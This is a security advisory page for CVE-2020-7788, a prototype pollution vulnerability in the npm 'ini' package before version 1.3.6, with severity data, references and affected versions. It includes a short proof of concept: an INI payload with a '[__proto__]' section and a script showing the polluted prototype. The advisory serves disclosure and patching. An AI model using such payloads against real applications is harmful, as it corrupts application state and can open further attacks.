Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXFxZ3gtMnAyaC05YzM3
ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse
Overview
The ini
npm package before version 1.3.6 has a Prototype Pollution vulnerability.
If an attacker submits a malicious INI file to an application that parses it with ini.parse
, they will pollute the prototype on the application. This can be exploited further depending on the context.
Patches
This has been patched in 1.3.6.
Steps to reproduce
payload.ini
[__proto__]
polluted = "polluted"
poc.js:
var fs = require('fs')
var ini = require('ini')
var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)
> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted
Permalink: https://github.com/advisories/GHSA-qqgx-2p2h-9c37JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXFxZ3gtMnAyaC05YzM3
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: over 3 years ago
Updated: 9 months ago
CVSS Score: 7.3
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Identifiers: GHSA-qqgx-2p2h-9c37, CVE-2020-7788
References:
- https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1
- https://www.npmjs.com/advisories/1589
- https://snyk.io/vuln/SNYK-JS-INI-1048974
- https://nvd.nist.gov/vuln/detail/CVE-2020-7788
- https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html
- https://github.com/advisories/GHSA-qqgx-2p2h-9c37
Blast Radius: 46.0
Affected Packages
npm:ini
Dependent packages: 3,846Dependent repositories: 1,985,226
Downloads: 188,363,419 last month
Affected Version Ranges: < 1.3.6
Fixed in: 1.3.6
All affected versions: 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.1.0, 1.2.0, 1.2.1, 1.3.0, 1.3.1, 1.3.2, 1.3.3, 1.3.4, 1.3.5
All unaffected versions: 1.3.6, 1.3.7, 1.3.8, 2.0.0, 3.0.0, 3.0.1, 4.0.0, 4.1.0, 4.1.1, 4.1.2